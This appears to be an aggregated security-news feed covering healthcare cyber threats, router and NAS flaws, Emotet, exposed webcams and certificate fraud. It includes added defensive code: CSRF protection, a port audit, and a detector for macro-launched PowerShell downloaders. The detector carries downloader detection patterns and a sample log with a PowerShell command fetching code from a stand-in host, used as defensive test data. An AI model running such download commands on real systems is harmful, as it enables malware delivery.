When it comes to the operational end of healthcare, the consequences of a cyber attack can be catastrophic. A cyber attack on a healthcare system can be dangerous and life-threatening – imagine critical care patients being locked out of the system. Given that organisations in this sector store potentially vital personal information, it is even more worrisome that the sector is not investing much in cybersecurity.

The industry needs to act swiftly.

For stakeholders, here are some of the top cybersecurity issues facing this sector –

1. Ransomware

To reiterate, healthcare data is a thriving breeding ground for hackers all over the world. It consists primarily of highly confidential patient care details, insurance information and financial data. This information can be stolen and sold to an array of buyers; pharmaceutical behemoths, insurance bigwigs and banking juggernauts are just some of them.

Hence, ransomware is the preferred tactic for cyberattackers seeking to sabotage the healthcare industry at large. Typically, attackers gain access to systems and encrypt data, locking the original users out. These users are then threatened that the encrypted information will be deleted or leaked unless they pay a ransom (mostly in a cryptocurrency such as Bitcoin), and the attackers make clear that the data will only be released after payment.

2. Insider Threats

Insider threats are certainly not a new risk anymore but their threat potential is increasing as we speak. Data is now routinely being stored in the cloud which means employees of an organization have a lot of access to sensitive data within the organization. This is compounded by the fact that humans can often be the weakest link in any cybersecurity framework.

3. Advanced Persistent Threats (APT)

Advanced persistent threats refer to malicious campaigns where attackers breach a network and then stay there, quietly gathering intelligence about the target. They can sometimes go undetected for months or even years. The main aim of APTs is to steal sensitive confidential data. They enter an organizational network, expand their presence slowly and gather data before finally exiting. Data from the healthcare industry is exceedingly valuable – and hence cybercriminals know it’s worth it to think long-term in terms of securing this data.

4. Mobile devices

According to statistics, 68% of healthcare security breaches were due to lost or stolen mobile devices. Healthcare providers routinely use mobile devices for services such as submitting patient data, submitting bills and scheduling appointments, increasing the amount of patient data being disseminated. Lost or stolen mobile devices are one of the leading causes of healthcare data breaches.

5. Spear phishing

A variation of phishing, spear phishing is a big threat to the healthcare industry – just like APTs, it gives attackers access to valuable data. Hackers send a targeted email to an individual which appears to come from a trusted source. The agenda of these emails, like that of any other cyber fraud, is either to gain access to the user’s system or to obtain other classified information. Spear phishing is considered one of the most successful cyber-attack techniques because of the high level of personalisation used against targeted users, which makes it highly believable.

Stay protected against all these threats by employing Seqrite’s range of solutions which are defined by innovation and simplicity. Through a combination of intelligence, analysis of applications and state-of-the-art technology, Seqrite provides the best defence against myriad cybersecurity threats.

The post The healthcare industry’s largest cyber challenges appeared first on Seqrite Blog.

New Test Service Launched to Gauge Tech Skills of Job Candidates


A new testing service has been launched with the aim of gauging and ranking job candidates based on their technical skillsets.

TechRank, created by Pioneer Labs, is run by tech consultants and sources, tests and objectively ranks tech talent, helping companies hire the best and most capable person for tech-based roles. TechRank seeks to eliminate the subjectivity of personality and interview charm and to ensure that jobs are offered based on genuine skillsets.

Candidates take the TechRank test online, opting for the specific area relevant to their skills. Candidates are then logged in the TechRank system and alerted if a suitable job is advertised. Employers can sort candidates by their skill level more quickly and accurately than by reading through large numbers of CVs.

TechRank was co-founded by Gurvinder Singh, Co-CEO of Pioneer Labs, who explained how TechRank was born out of frustration.

“We were finding it highly time-consuming and difficult to find great tech talent. It was a constant problem. So, we asked ourselves what needed to change and how this could be facilitated – the answer was clearly testing. It’s great for both the candidate and the employer. We trialled the system in our own business and found that it worked really well. It made a huge difference to Pioneer Labs so we decided to create a version that other businesses could use – and TechRank was born.”

Speaking to Infosecurity, Singh said: “We are looking to disrupt tech recruitment. We believe tech recruitment has been broken for far too long. It’s been very difficult for employers to be sure they are hiring people with the right skills; skills that are suitable for the specific job they are being asked to do. Some people look great on paper, perform brilliantly at interview, but simply don’t have the level of knowledge required for the job on offer.

“In the future, I believe CVs will become obsolete in the tech industry. Skills matter more than words and finding the best skilled people is where companies, which are trying to build or maintain market share via technology, will be competing most vigorously.”

Experts found 125 new flaws in SOHO routers and NAS devices from multiple vendors

Researchers discovered many flaws in over a dozen small office/home office (SOHO) routers and network-attached storage (NAS) devices.

Security experts have discovered multiple vulnerabilities in over a dozen small office/home office (SOHO) routers and network-attached storage (NAS) devices. The research is part of a project dubbed SOHOpelessly Broken 2.0 conducted by Independent Security Evaluators (ISE).

In this phase of the project that started in 2013 (SOHOpelessly Broken 1.0), the researchers assessed the security of 13 SOHO router and NAS devices and found a total of 125 new vulnerabilities. 

“Today, we show that security controls put in place by device manufacturers are insufficient against attacks carried out by remote adversaries. This research project aimed to uncover and leverage new techniques to circumvent these new security controls in embedded devices.” reads the report published by the experts.

“Embedded devices are special-purpose computing systems. These types of systems include industrial controllers, small office/home office (SOHO) routers, network-attached storage devices (NAS), and IP cameras. Internet-connected embedded devices are often placed into a broader category referred to as IoT devices. “

The experts tested SOHO routers and NAS devices from the following vendors:

  • Buffalo
  • Synology
  • TerraMaster
  • Zyxel
  • Drobo
  • ASUS and its subsidiary Asustor
  • Seagate
  • QNAP
  • Lenovo
  • Netgear
  • Xiaomi
  • Zioncom (TOTOLINK)

The experts discovered at least one web application vulnerability in each device they tested that could be exploited by a remote attacker to obtain a shell on the device or gain access to its administrative panel.

The experts obtained root shells on 12 of the devices, allowing them to take over the vulnerable systems, and six of them can be exploited remotely without authentication: the Asustor AS-602T, Buffalo TeraStation TS5600D1206, TerraMaster F2-420, Drobo 5N2, Netgear Nighthawk R9000, and TOTOLINK A3002RU.

The list of flaws discovered by the researchers includes authorization bypass, authentication bypass, buffer overflow, command injection, SQL injection (SQLi), cross-site scripting (XSS), cross-site request forgery (CSRF), and file upload path traversal vulnerabilities.

According to the experts, the level of security of IoT devices has improved only slightly since SOHOpelessly Broken 1.0: only a limited number of devices were found to implement defense-in-depth mechanisms such as address-space layout randomization (ASLR), functionality that hinders reverse engineering, and integrity verification mechanisms for HTTP requests.

“Perhaps more interesting is the amount of approaches that have not changed since SOHOpelessly Broken 1.0. Features such as anti-CSRF tokens and browser security headers, which are commonplace in mainstream web applications, are still rare among our sample of devices.” concludes the report. “These defense-in-depth mechanisms can greatly enhance the security posture of web applications and the underlying systems they interact with. In many cases, our remote exploits wouldn’t have worked if customary web application security practices had been implemented.”

The researchers responsibly disclosed all of the vulnerabilities they discovered to the affected vendors; most of them responded quickly and addressed the issues.

Unfortunately, some manufacturers, including Drobo, Buffalo Americas, and Zioncom Holdings, did not respond to the report.
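The report singles out anti-CSRF tokens and browser security headers as web-application defences that remain rare on these devices. The following is an added example (not ISE's code nor any vendor's firmware) of what those two controls look like in an embedded admin interface: a CSRF token cryptographically bound to the session with an HMAC, enforced only on state-changing methods, and a fixed set of security headers attached to every response. The function and header names, the response shape and the hypothetical "reboot" action are assumptions made for the example.

```python
# Added example: session-bound anti-CSRF token plus security headers for a
# device admin panel. Names, the secret and the response shape are assumptions.
import hmac
import hashlib
import secrets
from typing import Dict, Optional

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}  # never change state, no token needed

# Headers an admin panel should send on every response: no framing by other
# origins (clickjacking), no content sniffing, no referrer leakage, no caching.
SECURITY_HEADERS: Dict[str, str] = {
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "no-referrer",
    "Cache-Control": "no-store",
}


def make_csrf_token(secret: bytes, session_id: str) -> str:
    """Issue a token tied to this session: nonce.HMAC(secret, session_id:nonce).

    Because the MAC covers the session id, a token issued to one session is
    useless when replayed from another, and the server stores nothing extra."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(secret: bytes, session_id: str, token: Optional[str]) -> bool:
    """Recompute the MAC for this session and compare it in constant time."""
    if not token or token.count(".") != 1:
        return False
    nonce, mac = token.split(".")
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def authorize_request(secret: bytes, session_id: str, method: str,
                      form_token: Optional[str]) -> bool:
    """Allow safe methods; require a valid session-bound token for state changes."""
    if method.upper() in SAFE_METHODS:
        return True
    return verify_csrf_token(secret, session_id, form_token)


def render_response(body: str, status: int = 200) -> Dict:
    """Build a response dict (constructed shape) carrying the security headers."""
    headers = dict(SECURITY_HEADERS)
    headers["Content-Type"] = "text/html; charset=utf-8"
    return {"status": status, "headers": headers, "body": body}


def handle_reboot(secret: bytes, session_id: str, method: str,
                  form_token: Optional[str]) -> Dict:
    """Hypothetical state-changing admin action guarded by the CSRF check."""
    if not authorize_request(secret, session_id, method, form_token):
        return render_response("forbidden: missing or invalid CSRF token", 403)
    return render_response("rebooting")


if __name__ == "__main__":
    key = secrets.token_bytes(32)          # per-device secret, generated at boot
    tok = make_csrf_token(key, "session-123")
    print(handle_reboot(key, "session-123", "POST", tok)["status"])   # 200
    print(handle_reboot(key, "session-123", "POST", None)["status"])  # 403
```

The token is embedded in the admin form as a hidden field and checked on every POST; a request forged from another origin cannot read it, so the forged POST is rejected with 403 while the security headers stop the same page from being framed or sniffed.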

Pierluigi Paganini

(SecurityAffairs – SOHOpelessly Broken, hacking)

The post Experts found 125 new flaws in SOHO routers and NAS devices from multiple vendors appeared first on Security Affairs.

Emotet Botnet Returns After Four-Month Hiatus With New Spam Campaign

The actors responsible for the Emotet botnet returned after a four-month period of inactivity with a new malspam campaign. On 16 September, SpamHaus security researcher Raashid Bhat spotted a spate of new spam emails written in Polish or German that contained malicious attachments or links to malware downloads. Emotet is fully back in action and […]… Read More

The post Emotet Botnet Returns After Four-Month Hiatus With New Spam Campaign appeared first on The State of Security.

Webcam Security Snafus Expose 15,000 Devices


Researchers have discovered 15,000 private webcams around the globe which could be accessed by anyone with an internet connection, raising serious security and privacy concerns.

Working for Wizcase, white hat Avishai Efrat located the exposed devices from multiple manufacturers including: AXIS net cameras; Cisco Linksys webcam; IP Camera Logo Server; IP WebCam; IQ Invision web camera; Mega-Pixel IP Camera; Mobotix; WebCamXP 5 and Yawcam.

They appear to have been installed by both home users and businesses in multiple countries across Europe, the Americas and Asia.

By failing to put in place even cursory protection on the devices, these owners are exposing not only the webcam streams themselves but also, in some cases where admin access is possible, user information and approximate geolocation. In these cases, Efrat was also theoretically able to remotely control the device view and angle.

Control of such feeds and personal info could allow attackers to rob the premises being monitored, blackmail users, and even steal PII for identity fraud.

The problem lies with the cameras’ remote access functionality. In some cases UPnP was enabled without additional protections like password authentication or IP/MAC address whitelisting, whilst in others unsecured P2P networking was used.

“Web cameras manufacturers strive to use technologies which make the device installation as seamless as possible but this sometimes results in open ports with no authentication mechanism set up. Many devices aren’t put behind firewalls, VPNs, or whitelisted IP access – any of which would deny scanners and arbitrary connections,” explained Wizcase web security expert, Chase Williams.

“If these devices have open network services, then they could be exposed.”

Wizcase urged webcam operators to change the default configuration of their device in order to: whitelist specific IP & MAC addresses to access the web camera, add strong password authentication and disable UPnP if P2P networking is being used.

It also advised users to configure a home VPN network so the webcam would no longer be exposed to the public-facing internet.

Emotet is Back and Spamming Again


A notorious botnet has begun sending out spam again after a hiatus of several months, which could spell bad news for organizations around the world.

Emotet had been dormant for around four months, but started pumping out spam on Monday morning, with phishing emails sent in German, Polish, English and Italian, according to Malwarebytes.

The firm said that an uptick in command-and-control (C2) server activity forewarned it of a return to the front line for the infamous botnet.

In this new campaign, users are tricked into opening an attached document and enabling macros, triggering a PowerShell command which will try to download Emotet from compromised sites, often those running WordPress.

“Once installed on the endpoint, Emotet attempts to spread laterally, in addition to stealing passwords from installed applications. Perhaps the biggest threat, though, is that Emotet serves as a delivery vector for more dangerous payloads, such as ransomware,” warned Malwarebytes.

“Compromised machines can lay in a dormant state until operators decide to hand off the job to other criminal groups that will attempt to extort large sums of money from their victims. In the past, we’ve seen the infamous Ryuk ransomware being deployed that way.”

Linked to the North Korean Lazarus Group, Ryuk is thought to have made almost $3.8m for its operators in the six months to January 2019.

Like Trickbot, Emotet was originally a banking Trojan that was re-written to function as a malware loader. Its operators sell access to the botnet for clients to use as a malware distribution network.

According to Malwarebytes, Emotet malware was detected and removed over 1.5 million times between January and September 2018 alone. In July last year, the threat became so serious that the US-CERT was forced to release an alert about Emotet and its capabilities.
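The delivery chain described above (a document whose macros launch a PowerShell command that downloads the loader) leaves a characteristic trace in process-creation telemetry: an Office application as the parent of a script host, with downloader traits on the command line. The following added example, which is not Malwarebytes' code, scores such records. It parses a constructed, simplified key=value rendering of the fields found in Sysmon Event ID 1 (ParentImage, Image, CommandLine, User); the log lines, the scoring thresholds and the indicator lists are assumptions for the example, not a vendor's rule set.

```python
# Added example (not Malwarebytes' or any vendor's code): flag the
# Office -> script host -> download chain in process-creation telemetry.
# SAMPLE_LOG is a constructed 'Key=Value|Key=Value' format, not real Sysmon output.
import re
from dataclasses import dataclass
from typing import List, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Command-line traits typical of a macro-launched downloader stage.
SUSPICIOUS_ARGS = {
    "hidden window":   re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "encoded command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy bypass":   re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    "web download":    re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
}


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str = ""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_log(text: str) -> List[ProcessEvent]:
    """Parse constructed 'Key=Value|Key=Value' records (no '|' inside values)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(part.split("=", 1) for part in line.split("|"))
        events.append(ProcessEvent(fields.get("ParentImage", ""), fields.get("Image", ""),
                                   fields.get("CommandLine", ""), fields.get("User", "")))
    return events


def score_event(ev: ProcessEvent) -> Tuple[int, List[str]]:
    """Return (severity, reasons): 0 benign, 1 suspicious, 2 high.

    High means an Office application launched a script host AND the command
    line carries downloader traits; either signal on its own is only suspicious."""
    reasons = []
    office_child = (basename(ev.parent_image) in OFFICE_PARENTS
                    and basename(ev.image) in SCRIPT_HOSTS)
    if office_child:
        reasons.append(f"{basename(ev.parent_image)} spawned {basename(ev.image)}")
    for label, pattern in SUSPICIOUS_ARGS.items():
        if pattern.search(ev.command_line):
            reasons.append(label)
    if office_child and len(reasons) > 1:
        return 2, reasons
    return (1 if reasons else 0), reasons


def triage(text: str) -> List[Tuple[int, str, List[str]]]:
    """Score every record in the log; returns (severity, user, reasons) per event."""
    out = []
    for ev in parse_log(text):
        severity, reasons = score_event(ev)
        out.append((severity, ev.user, reasons))
    return out


# Constructed sample telemetry (the encoded blob is just "A" * 20 in UTF-16LE base64).
SAMPLE_LOG = r"""
ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -ep bypass -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA|User=CORP\alice
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell Get-ChildItem C:\Users\bob\Documents|User=CORP\bob
ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c echo hello|User=CORP\carol
ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell (New-Object Net.WebClient).DownloadString('http://example.invalid/x')|User=CORP\dave
"""

if __name__ == "__main__":
    for severity, user, reasons in triage(SAMPLE_LOG):
        print(severity, user, "; ".join(reasons))
```

Only the first record reaches severity 2: Word launched PowerShell with a hidden window, a policy bypass and an encoded command. Excel spawning cmd.exe and an Explorer-launched DownloadString each score 1, which is the right level for analyst review rather than an automatic block, and the ordinary Get-ChildItem scores 0.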

Most Port Vulnerabilities Are Found in Three Ports


The vast majority of vulnerabilities in ports are found in just three, making it theoretically easier for organizations to defend them against attack, according to Alert Logic.

The security vendor analyzed 1.3 petabytes of security data, over 2.8 billion IDS events, 8.2 million verified incidents, and common vulnerabilities for more than 700 SMB customers, in order to compile its Critical Watch Report for 2019.

It claimed that 65% of vulnerabilities it found in Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) ports are linked to SSH (22/TCP), HTTPS (443/TCP) and HTTP (80/TCP).

RDP/TCP comes in fourth place, which is no surprise as it has already been patched several times by Microsoft, including once for the BlueKeep bug, which Redmond warned could provide attackers with WannaCry-like “wormable” capabilities.

The number of vulnerabilities in a port is a good indication of its popularity and it’s no surprise that the top three ports for flaws are also ones exposed to the public-facing internet, Alert Logic said.

However, the findings may provide useful intel for security teams in smaller companies to help them reduce their attack surface quickly and easily.

“As basic guidance, security across all network ports should include defense-in-depth. Ports that are not in use should be closed and organizations should install a firewall on every host as well as monitor and filter port traffic,” the report advised.

“Regular port scans and penetration testing are also best practices to help ensure there are no unchecked vulnerabilities.”

Alert Logic also urged IT security teams to patch and harden any device, software or service connected to ports and to tackle any new vulnerabilities as they appear, as well as changing all default settings and passwords and running regular configuration checks.

The report found that most unpatched vulnerabilities in the SMB space are over a year old, and that misconfigurations, weak encryption and unsupported Windows versions also represent serious risks.
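Alert Logic's guidance to close unused ports and run a host firewall, and the exposed-webcam story above (devices reachable because a service listens on every interface with no filtering in front of it), both come down to the same check: which sockets are bound to a wildcard address, and are they meant to be? The following added example, not Alert Logic's or Wizcase's code, parses `ss -tlnp`-style output, reports network-reachable listeners that are not on an allowlist, and emits a default-deny nftables input chain for the allowlist. The sample socket table is constructed for the example, and the allowlist and function names are assumptions.

```python
# Added example (not Alert Logic's or Wizcase's code): audit listening TCP
# sockets against an allowlist and generate a default-deny nftables ruleset.
# SAMPLE_SS is constructed `ss -tlnp`-style output, not captured from a host.
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Bind addresses that mean "every interface", i.e. reachable from the network.
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}
PROC_RE = re.compile(r'\(\("([^"]+)"')  # first name inside users:(("name",pid=..,fd=..))


@dataclass
class Listener:
    addr: str
    port: int
    process: str

    @property
    def exposed(self) -> bool:
        """True when the socket is bound to a wildcard address."""
        return self.addr in WILDCARD_ADDRS


def parse_ss(text: str) -> List[Listener]:
    """Parse LISTEN rows of `ss -tlnp`; the header and any other rows are skipped."""
    listeners = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue
        addr, port = cols[3].rsplit(":", 1)      # '[::]:8000' -> '[::]', '8000'
        m = PROC_RE.search(line)
        listeners.append(Listener(addr, int(port), m.group(1) if m else "?"))
    return listeners


def audit(listeners: Iterable[Listener], allowed_ports: Set[int]) -> List[Listener]:
    """Network-reachable listeners whose port is not on the allowlist.

    Loopback-only services (127.0.0.1, ::1) are not reported: they are not
    reachable from the network, which is the exposure this audit is about."""
    return [l for l in listeners if l.exposed and l.port not in allowed_ports]


def nft_ruleset(allowed_ports: Set[int]) -> str:
    """Default-deny inet input chain admitting only the allowed TCP ports."""
    ports = ", ".join(str(p) for p in sorted(allowed_ports))
    return (
        "table inet filter {\n"
        "  chain input {\n"
        "    type filter hook input priority 0; policy drop;\n"
        "    iif lo accept\n"
        "    ct state established,related accept\n"
        "    ct state invalid drop\n"
        f"    tcp dport {{ {ports} }} accept\n"
        "  }\n"
        "}\n"
    )


# Constructed sample: web and SSH on purpose, a database on loopback, and two
# stray services (a Java app and a Python dev server) listening on all interfaces.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80          0.0.0.0:*         users:(("nginx",pid=1201,fd=6))
LISTEN 0      511    *:443               *:*               users:(("nginx",pid=1201,fd=7))
LISTEN 0      128    127.0.0.1:5432      0.0.0.0:*         users:(("postgres",pid=950,fd=5))
LISTEN 0      50     0.0.0.0:8080        0.0.0.0:*         users:(("java",pid=2210,fd=44))
LISTEN 0      5      [::]:8000           [::]:*            users:(("python3",pid=3011,fd=3))
"""

ALLOWED = {22, 80, 443}   # assumed allowlist for this host

if __name__ == "__main__":
    for l in audit(parse_ss(SAMPLE_SS), ALLOWED):
        print(f"unexpected listener: {l.process} on {l.addr}:{l.port}")
    print(nft_ruleset(ALLOWED))
```

On a real host the input would come from `ss -tlnp` run as root, and the generated ruleset would be reviewed and loaded with `nft -f`; the point of generating it from the same allowlist is that the audit and the firewall cannot drift apart. The 8080 and 8000 listeners are what the audit surfaces here, while the loopback-only database is correctly left alone.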

Security as a Service: Why Apply for SECaaS?

In today’s corporate environment, businesses and organizations rely heavily on services. This is especially true for their IT department, whose proprietary system and infrastructures can be costly to build. “As-a-service” products range in various types across all industries, and security as a service is one such product.

What Is Security as a Service (SECaaS)?

Security as a service (SECaaS) is a business model that offers companies and organizations affordable cloud-based cybersecurity services. Through SECaaS, companies and organizations no longer need to buy cybersecurity hardware or software to improve their cybersecurity system.

The company also doesn’t need to hire extra personnel to handle cybersecurity on a daily basis. In a security as a service model, the provider handles the management of the company’s cybersecurity.

Benefits of SECaaS

Security as a service is not a new business model, but cloud computing and other advancements in technology have made SECaaS a more cost-effective choice than having a heavily dedicated in-house cybersecurity group.

Below are the benefits of security as a service:

Affordability

Security as a service is the most affordable way to strengthen a company’s cybersecurity. Because SECaaS providers offer their services to multiple clients through a cloud platform, they can keep their rates low and affordable even for midsize companies.

Use of the latest cybersecurity tools

Through security as a service, companies can use the latest cybersecurity tools and software without having to buy them themselves. Their cybersecurity tools won’t fall behind industry standards, and hackers cannot use old exploits to infiltrate their systems.

Lower overhead cost

Since companies don’t need to hire extra personnel and buy patches for cybersecurity tools, the company has less overhead cost. In the long run, this can translate to profits that can be put into expansion or other investments.

Better data management

Through SECaaS, organizations can be sure that their data remains safe and secure. SECaaS providers monitor the movement of data across the company’s network and can detect when a user tries to access a file without permission.

Security as a Service Example

Security as a service offers a broad spectrum of cybersecurity services and solutions. Because of this breadth, the non-profit organization Cloud Security Alliance has grouped them into the following categories:

Network Security

Cybersecurity service that provides network access permissions while monitoring and protecting network services.

Vulnerability Scanning

Focuses on scanning and evaluating the client’s system for security vulnerabilities.

Web Security

Protects the company network from website and internet-based attacks.

Email Security

Monitors inbound and outbound emails for any malicious files and attachments, spam emails, and phishing emails.

Encryption

A service where outbound files are scrambled using ciphers to prevent any third party from reading the file.

Data Loss Prevention (DLP)

Monitors, protects, and backs up files in case of a data breach or loss.

Final Note

Businesses today know just how important data and information are. That’s why cybersecurity is a top priority for many businesses that deal with sensitive information.

Through security as a service (SECaaS), companies of all sizes can have the best cybersecurity without breaking the bank.


The post Security as a Service: Why Apply for SECaaS? appeared first on .

Fraudulent purchases of digital certificates through executive impersonation

Experts at ReversingLabs spotted a threat actor buying digital certificates by impersonating legitimate entities and then selling them on the black market.

Researchers at ReversingLabs have identified a new threat actor that is buying digital certificates by impersonating company executives, and then selling them on the black market. The experts discovered that digital certificates are then used to spread malware, mainly adware.

Threat actors sign their malware with legitimate digital certificates to avoid detection.

The experts provided details of a certificate fraud that relies on executive impersonation. The researchers provided evidence that the threat actors sold the purchased certificates to a cybercrime gang that used them to spread malware.

The analysis published by ReversingLabs provides technical details for each phase of the certificate fraud carried out by impersonating executives.

The fraud begins with the reconnaissance phase in which the attackers select the target to impersonate. Threat actors use publicly available information to select candidates that are usually well-established people working in the software industry.

Once a target is identified, the threat actors scrape the victim’s information from open sources, such as their public LinkedIn profile page. The attackers then set up legitimate-looking infrastructure for the entity they are impersonating in an attempt to deceive certificate authorities.

“The attacker aims to use the top-level domain confusion in order to mislead the certificate authority during their identity verification process. The gamble is that the person verifying the certificate issuance request will assume that the same company owns both the global .COM and the regional .CO.UK domains for their business.” reads the analysis published by the experts.

“Here’s where the choice of registrar becomes truly important. Since GDPR legislation came into effect, most EU domain registrars have agreed that WHOIS records are considered private and personally identifiable information. This makes knowing the true identity behind the registered domain name subject to a data release process – a bureaucratic procedure meant to be fulfilled in cases of a legitimate enquiry such as a trademark dispute or a law enforcement request.”

Once the infrastructure is set up, the threat actors proceed to purchase the certificates and verify them. The verification is done using a public antivirus scanning service; the threat actors then use the file scan record as “a clean bill of health” for potential buyers.

“2019-04-30 07:07:59 – The first signed malicious file appears in the wild. The certificate is used to sign OpenSUpdater, an adware application that can install unwanted software on the client’s machine. This executable is cross-signed for timestamp verification via Symantec Time Stamping Services Signer service.” continues the analysis.

The experts pointed out that even though it is harder for an attacker to acquire digital certificates this way, the threat actors they tracked have shown that it is in fact possible to do so.

Pierluigi Paganini

(SecurityAffairs – digital certificates, hacking)

The post Fraudulent purchases of digital certificates through executive impersonation appeared first on Security Affairs.

Keeping Passwords Simple

We know that at times this whole password thing sounds really complicated. Wouldn't it be great if there was a brain-dead simple way you could keep passwords simple and secure at the same time? Well, it's not nearly as hard as you think. Here are three tips for keeping passwords super simple while keeping your accounts super secure.

Five ways to manage authorization in the cloud

The public cloud is being rapidly incorporated by organizations, allowing them to store larger amounts of data and applications with higher uptime and reduced costs, while at the same time, introducing new security challenges. One of the more prominent challenges is identity management and authorization. Since the beginning of cloud computing, authorization techniques in the cloud have evolved into newer models, which acknowledge the many different services that now come together to form a company’s … More

The post Five ways to manage authorization in the cloud appeared first on Help Net Security.

Targeted threat intelligence and what your organization might be missing

In this Help Net Security podcast recorded at Black Hat USA 2019, Adam Darrah (Director of Intelligence), Mike Kirschner (Chief Operating Officer) and Christian Lees (Chief Technology Officer) from Vigilate, talk about how their global threat hunting and dark web cyber intelligence research team extends the reach of a company’s security resources, and lives within the underground community to remain ahead of emerging threats. Where many other solutions rely on machine learning (ML) to access … More

The post Targeted threat intelligence and what your organization might be missing appeared first on Help Net Security.

Researchers uncover 125 vulnerabilities across 13 routers and NAS devices

In a cybersecurity study of network attached storage (NAS) systems and routers, Independent Security Evaluators (ISE) found 125 vulnerabilities in 13 IoT devices, reaffirming an industrywide problem of a lack of basic security diligence. The vulnerabilities discovered in the SOHOpelessly Broken 2.0 research likely affect millions of IoT devices. “Our results show that businesses and homes are still vulnerable to exploits that can result in significant damage,” says lead ISE researcher Rick Ramgattie. “These issues … More

The post Researchers uncover 125 vulnerabilities across 13 routers and NAS devices appeared first on Help Net Security.

BotSlayer tool can detect coordinated disinformation campaigns in real time

A new tool in the fight against online disinformation has been launched, called BotSlayer, developed by the Indiana University’s Observatory on Social Media. The software, which is free and open to the public, scans social media in real time to detect evidence of automated Twitter accounts – or bots – pushing messages in a coordinated manner, an increasingly common practice to manipulate public opinion by creating the false impression that many people are talking about … More

The post BotSlayer tool can detect coordinated disinformation campaigns in real time appeared first on Help Net Security.

Phishing attacks up, especially against SaaS and webmail services

Phishing attacks continued to rise into the summer of 2019 with cybercrime gangs’ focus on branded webmail and SaaS providers remaining very keen, according to the APWG report. The report also documents how criminals are increasingly perpetrating business email compromise (BEC) attacks by using gift card cash-out schemes. The number of phishing attacks observed in the second quarter of 2019 eclipsed the number seen in the three quarters before. The total number of phishing sites … More

The post Phishing attacks up, especially against SaaS and webmail services appeared first on Help Net Security.

Only 15% of organizations can recover from a severe data loss within an hour

There’s a global concern about the business impact and risk from rampant and unrestricted data growth, StorageCraft research reveals. It also shows that the IT infrastructures of many organizations are struggling, often failing, to deliver business continuity in the event of severe data outages. A total of 709 qualified individuals completed the research study. All participants had budget or technical decision-making responsibility for data management, data protection, and storage solutions at a company with 100-2,500 … More

The post Only 15% of organizations can recover from a severe data loss within an hour appeared first on Help Net Security.

How Will the CMMC Impact My Business and How Can We Prepare? Part 1 of 3

Part 1: Laying the Groundwork for Achieving Certification In June of this year, my colleague Tom Taylor wrote about the DoD’s announcement to instate the Cyber Security Maturity Model Certification (CMMC) and elaborated on the fact that, with the CMMC, the DoD appears to be addressing our customers’ core compliance pain points: Varying standards – […]… Read More

The post How Will the CMMC Impact My Business and How Can We Prepare? Part 1 of 3 appeared first on The State of Security.

Mini eBook: CCSP Practice Tests

The Certified Cloud Security Professional (CCSP) shows you have the advanced technical skills and knowledge to design, manage and secure data, applications and infrastructure in the cloud using best practices, policies and procedures. Download the Mini eBook for a sneak peek into the Official (ISC)² CCSP Practice Tests book. Inside you’ll find: 50 CCSP practice test items and answers to gauge your knowledge. Discount code to save on the full version which includes 1,000 items.

The post Mini eBook: CCSP Practice Tests appeared first on Help Net Security.

ImmuniWeb Discovery diminishes application security complexity and operational costs

ImmuniWeb, a global application security testing and security ratings company, is thrilled to announce the launch of ImmuniWeb Discovery that now offers:

  • continuous discovery of external digital web assets
  • actionable security ratings of asset hackability and attractiveness
  • continuous web security testing, best practices and compliance monitoring (PCI DSS, GDPR)
  • continuous monitoring of data leaks, source code exposure, phishing and domain squatting
  • monthly subscription starting at $99 per organization

ImmuniWeb Discovery substantially diminishes application security complexity … More

The post ImmuniWeb Discovery diminishes application security complexity and operational costs appeared first on Help Net Security.

Telia Carrier implements RPKI, reducing the risk of accidental route leaks

Telia Carrier has announced that it has implemented RPKI – a technology that validates and secures critical route updates, or BGP announcements, on its #1 ranked global Internet backbone. BGP is the central nervous system of the Internet, and RPKI reduces the risk of accidental route leaks, or even hijacks, which can result in critical outages or fraudulent traffic manipulation. Internet connectivity has become an indispensable part of our everyday lives and the networks at … More

The post Telia Carrier implements RPKI, reducing the risk of accidental route leaks appeared first on Help Net Security.

Accenture supports Exxaro to digitally transform its business and unlock new revenue streams

